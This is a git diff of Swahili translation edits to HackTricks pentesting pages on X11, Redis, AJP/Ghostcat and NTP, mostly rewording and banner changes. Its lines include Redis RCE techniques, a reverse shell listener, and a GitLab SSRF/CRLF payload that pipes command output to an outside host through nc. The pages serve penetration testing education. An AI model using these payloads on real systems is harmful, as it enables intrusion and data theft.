Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! -**Maoni ya Udukuzi**\ +**Uelewa wa Udukuzi**\ Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi -**Habari za Udukuzi za Wakati Halisi**\ -Endelea kuwa na habari kuhusu ulimwengu wa udukuzi kwa kupitia habari na maoni ya wakati halisi +**Habari za Udukuzi wa Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi -**Matangazo Mapya**\ -Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 43b9c77d4..1104e2821 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -15,7 +15,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: {% endhint %} -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -32,7 +32,7 @@ Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya ## Taarifa za Msingi -**X Window System** (X) ni mfumo wa dirisha unaotumika sana kwenye mifumo ya uendeshaji ya UNIX. Inatoa mfumo wa kuunda **interfaces za mtumiaji (GUIs)** za picha, huku programu binafsi zikishughulikia muundo wa interface ya mtumiaji. Ufanisi huu unaruhusu uzoefu tofauti na wa kubadilika ndani ya mazingira ya X. +**X Window System** (X) ni mfumo wa dirisha unaotumika sana kwenye mifumo ya uendeshaji inayotegemea UNIX. Inatoa mfumo wa kuunda **interfaces za mtumiaji (GUIs)** za picha, huku programu binafsi zikishughulikia muundo wa interface ya mtumiaji. Ufanisi huu unaruhusu uzoefu tofauti na wa kubadilika ndani ya mazingira ya X. **Bandari ya Kawaida:** 6000 ``` @@ -56,13 +56,13 @@ $ xxd ~/.Xauthority 00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X 00000030: 041d ef ... ``` -> MIT-magic-cookie-1: Kutengeneza 128bit ya ufunguo (β€œcookie”), na kuihifadhi katika \~/.Xauthority (au mahali ambapo XAUTHORITY envvar inaelekeza). Mteja anaituma kwa seva wazi! seva inakagua ikiwa ina nakala ya β€œcookie” hii na ikiwa ndivyo, muunganisho unaruhusiwa. ufunguo unatengenezwa na DMX. +> MIT-magic-cookie-1: Kutengeneza funguo ya 128bit (β€œcookie”), na kuihifadhi katika \~/.Xauthority (au mahali ambapo XAUTHORITY envvar inaelekeza). Mteja anaituma kwa seva wazi! seva inakagua ikiwa ina nakala ya β€œcookie” hii na ikiwa ndivyo, muunganisho unaruhusiwa. funguo inatengenezwa na DMX. {% hint style="warning" %} Ili **kutumia cookie** unapaswa kuweka env var: **`export XAUTHORITY=/path/to/.Xauthority`** {% endhint %} -#### Sehemu ya Uainishaji wa Mitaa +#### Kikao cha Uainishaji wa Mitaa ```bash $ w 23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 @@ -88,7 +88,7 @@ opened 10.9.xx.xx:0 for snoopng swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123 qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab ``` -## Kukamata picha za skrini +## Kupiga picha za skrini ```bash xwd -root -screen -silent -display > screenshot.xwd convert screenshot.xwd screenshot.png @@ -151,7 +151,7 @@ nc -lvp 5555 ``` Kisha, weka anwani yako ya IP na bandari katika chaguo la **R-Shell** na bonyeza **R-shell** ili kupata shell -## Marejeo +## Marejeleo * [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) @@ -161,17 +161,17 @@ Kisha, weka anwani yako ya IP na bandari katika chaguo la **R-Shell** na bonyeza * `port:6000 x11` -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! **Uelewa wa Udukuzi**\ -Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi +Shiriki na maudhui yanayoangazia msisimko na changamoto za udukuzi **Habari za Udukuzi za Wakati Halisi**\ -Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi +Baki na habari za kisasa katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi -**Matangazo ya Hivi Punde**\ +**Matangazo Mapya**\ Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index 6ae126015..bcd423adf 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -1,42 +1,42 @@ # 6379 - Pentesting Redis {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
{% endhint %} -
+
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Baki na habari za kisasa kuhusu ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi **Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! ## Basic Information -From [the docs](https://redis.io/topics/introduction): Redis ni chanzo wazi (licence ya BSD), katika **hifadhi ya muundo wa data** ya ndani, inayotumika kama **hifadhi ya data**, cache na wakala wa ujumbe). +Kutoka [the docs](https://redis.io/topics/introduction): Redis ni chanzo wazi (licence ya BSD), katika-mkondo **duka la muundo wa data**, inayotumika kama **database**, cache na broker wa ujumbe). -Kwa kawaida Redis hutumia protokali ya maandiko ya kawaida, lakini unapaswa kukumbuka kwamba inaweza pia kutekeleza **ssl/tls**. Jifunze jinsi ya [kuendesha Redis na ssl/tls hapa](https://fossies.org/linux/redis/TLS.md). +Kwa kawaida Redis hutumia itifaki ya maandiko ya kawaida, lakini unapaswa kukumbuka kwamba inaweza pia kutekeleza **ssl/tls**. Jifunze jinsi ya [kufanya kazi na Redis na ssl/tls hapa](https://fossies.org/linux/redis/TLS.md). -**Default port:** 6379 +**Port ya kawaida:** 6379 ``` PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 @@ -59,27 +59,29 @@ Katika mfano wa kawaida wa Redis unaweza tu kuungana kwa kutumia `nc` au unaweza nc -vn 10.10.10.10 6379 redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools ``` -The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned: - -Amri ya **kwanza** unayoweza kujaribu ni **`info`**. Inaweza **kurudisha matokeo yenye taarifa** ya mfano wa Redis **au kitu** kama ifuatavyo: +The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned: + +```swahili +Amri ya **kwanza** unayoweza kujaribu ni **`info`**. Inaweza **kurudisha matokeo yenye taarifa** ya mfano wa Redis **au kitu** kama ifuatavyo kinarejeshwa: +``` ``` -NOAUTH Authentication required. ``` -In this last case, this means that **unahitaji akreditif za halali** to access the Redis instance. +In this last case, this means that **unahitaji akreditivu halali** to access the Redis instance. ### Redis Authentication -**Kwa kawaida** Redis inaweza kufikiwa **bila akreditif**. Hata hivyo, inaweza **kuwekwa** ili kuunga mkono **tu nenosiri, au jina la mtumiaji + nenosiri**.\ -Inawezekana **kuweka nenosiri** katika _**redis.conf**_ file with the parameter `requirepass` **au ya muda** hadi huduma ipate kuanzishwa tena kwa kuungana nayo na kuendesha: `config set requirepass p@ss$12E45`.\ -Pia, **jina la mtumiaji** linaweza kuwekwa katika parameter `masteruser` ndani ya _**redis.conf**_ file. +**Kwa default** Redis can be accessed **bila akreditivu**. However, it can be **configured** to support **tu password, au username + password**.\ +It is possible to **set a password** in _**redis.conf**_ file with the parameter `requirepass` **au ya muda** until the service restarts connecting to it and running: `config set requirepass p@ss$12E45`.\ +Also, a **username** can be configured in the parameter `masteruser` inside the _**redis.conf**_ file. {% hint style="info" %} If only password is configured the username used is "**default**".\ -Pia, kumbuka kwamba hakuna **njia ya kupata kwa nje** ikiwa Redis iliwekwa na nenosiri pekee au jina la mtumiaji + nenosiri. +Also, note that there is **hakuna njia ya kupata nje** if Redis was configured with only password or username+password. {% endhint %} -In cases like this one you will **hitaji kupata akreditif za halali** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\ -**Iwapo umepata akreditif za halali unahitaji kuthibitisha kikao** after establishing the connection with the command: +In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\ +**Katika kesi umepata akreditivu halali unahitaji kuthibitisha kikao** after establishing the connection with the command: ```bash AUTH ``` @@ -87,7 +89,7 @@ AUTH ### **Uthibitishaji wa orodha** -Ikiwa seva ya Redis inaruhusu **muunganisho wa siri** au ikiwa umepata akreditif sahihi, unaweza kuanzisha mchakato wa orodha kwa huduma hiyo kwa kutumia **amri** zifuatazo: +Ikiwa seva ya Redis inaruhusu **muunganisho wa siri** au ikiwa umepata akreditif sahihi, unaweza kuanzisha mchakato wa orodha kwa huduma hiyo ukitumia **amri** zifuatazo: ```bash INFO [ ... Redis response with info ... ] @@ -106,7 +108,7 @@ Zaidi kuhusu kuunda huduma ya Redis kwa usalama hapa: [https://www.digitalocean. Unaweza pia **kufuatilia kwa wakati halisi amri za Redis** zinazotekelezwa kwa amri **`monitor`** au kupata **25 za maswali ya polepole zaidi** kwa **`slowlog get 25`** -Pata maelezo mengine ya kuvutia kuhusu amri zaidi za Redis hapa: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) +Pata taarifa zaidi za kuvutia kuhusu amri zaidi za Redis hapa: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) ### **Kutoa Hifadhidata** @@ -118,7 +120,7 @@ Au unaweza tu kupata **keyspaces** zote (hifadhidata) kwa: ``` INFO keyspace ``` -Katika mfano huo, **database 0 na 1** zinatumika. **Database 0 ina funguo 4 na database 1 ina 1**. Kwa default, Redis itatumia database 0. Ili kutekeleza dump kwa mfano database 1 unahitaji kufanya: +Katika mfano huo, **database 0 na 1** zinatumika. **Database 0 ina funguo 4 na database 1 ina 1**. Kwa default, Redis itatumia database 0. Ili kutekeleza mfano database 1 unahitaji kufanya: ```bash SELECT 1 [ ... Indicate the database ... ] @@ -127,9 +129,9 @@ KEYS * GET [ ... Get Key ... ] ``` -Inapofanyika upungufu wa `-WRONGTYPE Operation against a key holding the wrong kind of value` wakati wa kuendesha `GET ` ni kwa sababu funguo inaweza kuwa kitu kingine zaidi ya mfuatano au nambari na inahitaji opereta maalum kuionyesha. +Inapofanyika kupata kosa lifuatalo `-WRONGTYPE Operation against a key holding the wrong kind of value` wakati wa kuendesha `GET ` ni kwa sababu funguo inaweza kuwa kitu kingine zaidi ya string au integer na inahitaji opereta maalum kuionyesha. -Ili kujua aina ya funguo, tumia amri ya `TYPE`, mfano hapa chini kwa funguo za orodha na hash. +Ili kujua aina ya funguo, tumia amri `TYPE`, mfano hapa chini kwa funguo za orodha na hash. ```bash TYPE [ ... Type of the Key ... ] @@ -143,9 +145,9 @@ DUMP ``` **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) -
+
-Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty! +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty! **Hacking Insights**\ Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking @@ -156,13 +158,13 @@ Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari **Latest Announcements**\ Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! ## Redis RCE ### Interactive Shell -[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) inaweza kupata kiolesura cha mazungumzo au shell ya kurudi katika Redis(<=5.0.5). +[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) inaweza kupata kiolesura cha maingiliano au shell ya kurudi kiotomatiki katika Redis(<=5.0.5). ``` ./redis-rogue-server.py --rhost --lhost ``` @@ -201,7 +203,7 @@ sh.stderr.pipe(client); )()}} ``` {% hint style="warning" %} -Kumbuka kwamba **moto wa injini kadhaa za templeti** huhifadhi **templeti** katika **kumbukumbu**, hivyo hata kama unazifuta, mpya **haitatekelezwa**. Katika hali hizi, ama mendelezi aliacha upakiaji wa moja kwa moja ukiendelea au unahitaji kufanya DoS juu ya huduma (na kutarajia kwamba itazinduliwa tena kiotomatiki). +Kumbuka kwamba **mashine kadhaa za templeti huhifadhi** templeti katika **kumbukumbu**, hivyo hata ukizifuta, mpya **haitatekelezwa**. Katika hali hizi, ama mendelevu aliacha upya wa kiotomatiki kuwa hai au unahitaji kufanya DoS juu ya huduma (na kutarajia kwamba itazinduliwa tena kiotomatiki). {% endhint %} ### SSH @@ -241,12 +243,12 @@ OK ``` The last example is for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` -Hii mbinu pia inaweza kutumika kupata bitcoin :[yam](https://www.v2ex.com/t/286981#reply14) +This method can also be used to earn bitcoin :[yam](https://www.v2ex.com/t/286981#reply14) ### Load Redis Module 1. Kufuatia maelekezo kutoka [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) unaweza **kusanifu moduli ya redis ili kutekeleza amri zisizo na mipaka**. -2. Kisha unahitaji njia fulani ya **kupakia moduli iliyosanifiwa** +2. Kisha unahitaji njia fulani ya **kupakia moduli iliyokusanywa** 3. **Pakia moduli iliyopakiwa** wakati wa utendaji na `MODULE LOAD /path/to/mymodule.so` 4. **Orodhesha moduli zilizopakiwa** ili kuangalia kama imepakiwa vizuri: `MODULE LIST` 5. **Tekeleza** **amri**: @@ -262,7 +264,7 @@ Hii mbinu pia inaweza kutumika kupata bitcoin :[yam](https://www.v2ex.com/t/28 ### LUA sandbox bypass -[**Hapa**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) unaweza kuona kwamba Redis inatumia amri **EVAL** kutekeleza **kodii ya Lua iliyowekwa kwenye sanduku**. Katika chapisho lililounganishwa unaweza kuona **jinsi ya kuitumia vibaya** kwa kutumia kazi ya **dofile**, lakini [kwa kweli](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) hii si tena inawezekana. Hata hivyo, ikiwa unaweza **kuepuka sanduku la Lua** unaweza **kutekeleza amri zisizo na mipaka** kwenye mfumo. Pia, kutoka chapisho hilo hilo unaweza kuona baadhi ya **chaguzi za kusababisha DoS**. +[**Hapa**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) unaweza kuona kwamba Redis inatumia amri **EVAL** kutekeleza **kodii ya Lua iliyowekwa kwenye sanduku**. Katika chapisho lililounganishwa unaweza kuona **jinsi ya kuitumia vibaya** kwa kutumia kazi ya **dofile**, lakini [kwa wazi](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) hii si tena inawezekana. Hata hivyo, ikiwa unaweza **kuepuka sanduku la Lua** unaweza **kutekeleza amri zisizo na mipaka** kwenye mfumo. Pia, kutoka chapisho hilo hilo unaweza kuona baadhi ya **chaguzi za kusababisha DoS**. Baadhi ya **CVEs za kutoroka kutoka LUA**: @@ -298,22 +300,22 @@ Kwa hivyo, ikiwa unapata **SSRF vuln** kwenye tovuti na unaweza **kontroli** baa ### Mfano: Gitlab SSRF + CRLF kwa Shell -Katika **Gitlab11.4.7** iligundulika **SSRF** udhaifu na **CRLF**. Udhaifu wa **SSRF** ulikuwa katika **import project from URL functionality** wakati wa kuunda mradi mpya na uliruhusu kufikia IP zisizo na mipaka katika mfumo \[0:0:0:0:0:ffff:127.0.0.1] (hii itafikia 127.0.0.1), na **CRLF** vuln ilitumiwa kwa ku **ongeza %0D%0A** wahusika kwenye **URL**. +Katika **Gitlab11.4.7** iligundulika **SSRF** udhaifu na **CRLF**. Udhaifu wa **SSRF** ulikuwa katika **import project from URL functionality** wakati wa kuunda mradi mpya na uliruhusu kufikia IP zisizo na mipaka katika mfumo \[0:0:0:0:0:ffff:127.0.0.1] (hii itafikia 127.0.0.1), na **CRLF** vuln ilitumiwa kwa kuongezea tu wahusika **%0D%0A** kwenye **URL**. -Kwa hivyo, ilikuwa inawezekana **kutumia udhaifu hizi kuzungumza na Redis instance** ambayo **inasimamia foleni** kutoka **gitlab** na kutumia foleni hizo ili **kupata utekelezaji wa msimbo**. Payload ya matumizi ya foleni ya Redis ni: +Kwa hivyo, ilikuwa inawezekana **kutumia udhaifu huu kuzungumza na Redis instance** inayosimamia **queues** kutoka **gitlab** na kutumia hizo queues ili **kupata utekelezaji wa msimbo**. Payload ya matumizi ya Redis queue ni: ``` multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec ``` -Na **URL encode** ombi **linalotumia SSRF** na **CRLF** kutekeleza `whoami` na kutuma nyuma matokeo kupitia `nc` ni: +Na ombi la **URL encode** linalotumia **SSRF** na **CRLF** kutekeleza `whoami` na kutuma matokeo kupitia `nc` ni: ``` git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` -_Kwa sababu fulani (kama ilivyo kwa mwandishi wa_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _ambapo taarifa hii ilichukuliwa) matumizi ya udhaifu yalifanya kazi na mpango wa `git` na si mpango wa `http`._ +_Kwa sababu fulani (kama kwa mwandishi wa_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _ambapo taarifa hii ilichukuliwa) matumizi ya udhaifu yalifanya kazi na mpango wa `git` na si mpango wa `http`._ -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! @@ -337,8 +339,8 @@ Jifunze na fanya mazoezi ya Udukuzi wa GCP: Support HackTricks * Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! -* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Jiunge na** πŸ’¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
{% endhint %} diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index c5c773020..a2e0ad9df 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -49,7 +49,7 @@ PORT STATE SERVICE Ikiwa bandari ya AJP imewekwa wazi, Tomcat inaweza kuwa hatarini kwa udhaifu wa Ghostcat. Hapa kuna [exploit](https://www.exploit-db.com/exploits/48143) inayofanya kazi na tatizo hili. -Ghostcat ni udhaifu wa LFI, lakini kwa namna fulani umewekwa mipaka: faili tu kutoka kwenye njia fulani zinaweza kuvutwa. Hata hivyo, hii inaweza kujumuisha faili kama `WEB-INF/web.xml` ambazo zinaweza kuvuja taarifa muhimu kama vile akidi za kiingilio kwa interface ya Tomcat, kulingana na usanidi wa seva. +Ghostcat ni udhaifu wa LFI, lakini kwa namna fulani umewekwa mipaka: faili tu kutoka njia fulani zinaweza kuvutwa. Hata hivyo, hii inaweza kujumuisha faili kama `WEB-INF/web.xml` ambazo zinaweza kuvuja taarifa muhimu kama vile akidi za kiingilio kwa kiolesura cha Tomcat, kulingana na usanidi wa seva. Toleo zilizorekebishwa katika au juu ya 9.0.31, 8.5.51, na 7.0.100 zimefanya marekebisho ya tatizo hili. @@ -101,7 +101,7 @@ ajp_pass tomcats; } } ``` -Anza Nginx na uangalie kama kila kitu kinafanya kazi vizuri kwa kutoa ombi la cURL kwa mwenyeji wako wa ndani. +Anza Nginx na hakikisha kila kitu kinafanya kazi vizuri kwa kutoa ombi la cURL kwa mwenyeji wako wa ndani. ```html sudo nginx curl http://127.0.0.1:80 @@ -174,7 +174,7 @@ msf exploit(tomcat_mgr_deploy) > show options * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295) -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -187,7 +187,7 @@ Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maari **Latest Announcements**\ Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! {% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index 9f9fc7ce0..e0dbb9fbd 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -16,7 +16,7 @@ Learn & practice GCP Hacking:
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -71,7 +71,7 @@ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 1 [**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) -Protokali ya **NTP**, inayotumia UDP, inaruhusu kufanya kazi bila haja ya taratibu za handshake, tofauti na TCP. Sifa hii inatumika katika **NTP DDoS amplification attacks**. Hapa, washambuliaji wanaunda pakiti zenye IP ya chanzo bandia, na kufanya ionekane kama maombi ya shambulio yanatoka kwa mwathirika. Pakiti hizi, mwanzoni zikiwa ndogo, zinamfanya seva ya NTP kujibu kwa kiasi kikubwa cha data, na kuongeza nguvu ya shambulio. +Protokali ya **NTP**, inayotumia UDP, inaruhusu kufanya kazi bila haja ya taratibu za handshake, tofauti na TCP. Sifa hii inatumika katika **NTP DDoS amplification attacks**. Hapa, washambuliaji wanaunda pakiti zenye IP ya chanzo bandia, na kufanya ionekane kama maombi ya shambulio yanatoka kwa mwathirika. Pakiti hizi, mwanzoni ndogo, zinachochea seva ya NTP kujibu kwa kiasi kikubwa cha data, na kuongeza nguvu ya shambulio. Amri ya _**MONLIST**_, licha ya matumizi yake kuwa nadra, inaweza kuripoti wateja 600 wa mwisho waliounganishwa na huduma ya NTP. Ingawa amri yenyewe ni rahisi, matumizi yake mabaya katika mashambulizi kama haya yanaonyesha udhaifu mkubwa wa usalama. ```bash @@ -100,23 +100,23 @@ Name: Nmap Description: Enumerate NTP Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} ``` -
+
